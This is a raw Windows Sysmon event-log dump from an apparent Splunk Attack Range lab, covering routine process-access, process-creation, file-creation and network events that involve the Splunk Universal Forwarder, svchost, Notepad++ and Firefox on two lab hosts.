07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807187Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807186Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F440-60EB-6679-00000000D001}3820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807185Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807184Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F440-60EB-6679-00000000D001}3820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807183Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.765{0C1E0330-F440-60EB-6679-00000000D001}3820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807182Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.544{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0AB5FC9820CCB83A7E9D81A2D0C1E1D,SHA256=9E9A3DF50CC2313EF3227F0B4AA5F01B13DD81F14DEDAE411E3237E4C405DC67,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:15.769{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50999-false10.0.1.12-8000- 23542300x80000000000000001048000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:24.106{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72A30631206CE8CC7BDDD8A236DF96AB,SHA256=824041F313B39CCF77EA17F4C83996E99956132E3B4C4DC09C64CFCFBB8BFB65,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807181Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.482{0C1E0330-F440-60EB-6579-00000000D001}1252828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000807180Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:23.192{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57240-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000807179Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F440-60EB-6579-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807178Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807177Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807176Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807175Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807174Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807173Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807172Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807171Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807170Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.247{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F440-60EB-6579-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807169Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.247{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807168Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.247{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F440-60EB-6579-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807167Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.248{0C1E0330-F440-60EB-6579-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807211Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.700{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D9B967FD6AABE34D87DD020C0D7F01B,SHA256=4F1608F0F3408C348BC5BA829CB6C5E1CF36205726021014F35FB40B37A1D038,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:25.252{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=67B11B591D649AD9B770DDCB477B55F1,SHA256=C53B13E4A305195745057309897BDA354B88D67B162681FEE45CC7366D1A3182,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:25.205{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=06B808D8D07D488B3B36D9A71E3F3902,SHA256=197E9ED644811FDAB36894CD8B41B693FCE3A630F8658F14C7B76641584CAD72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:25.120{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D5FF48B01967F888FCF9F472C69DD55,SHA256=301D5B788D3AFC8104D182055DDE4B181BD93489BA800CEBBB55AE5171978FBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807210Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.419{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F441-60EB-6779-00000000D001}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807209Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807208Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.404{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807207Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 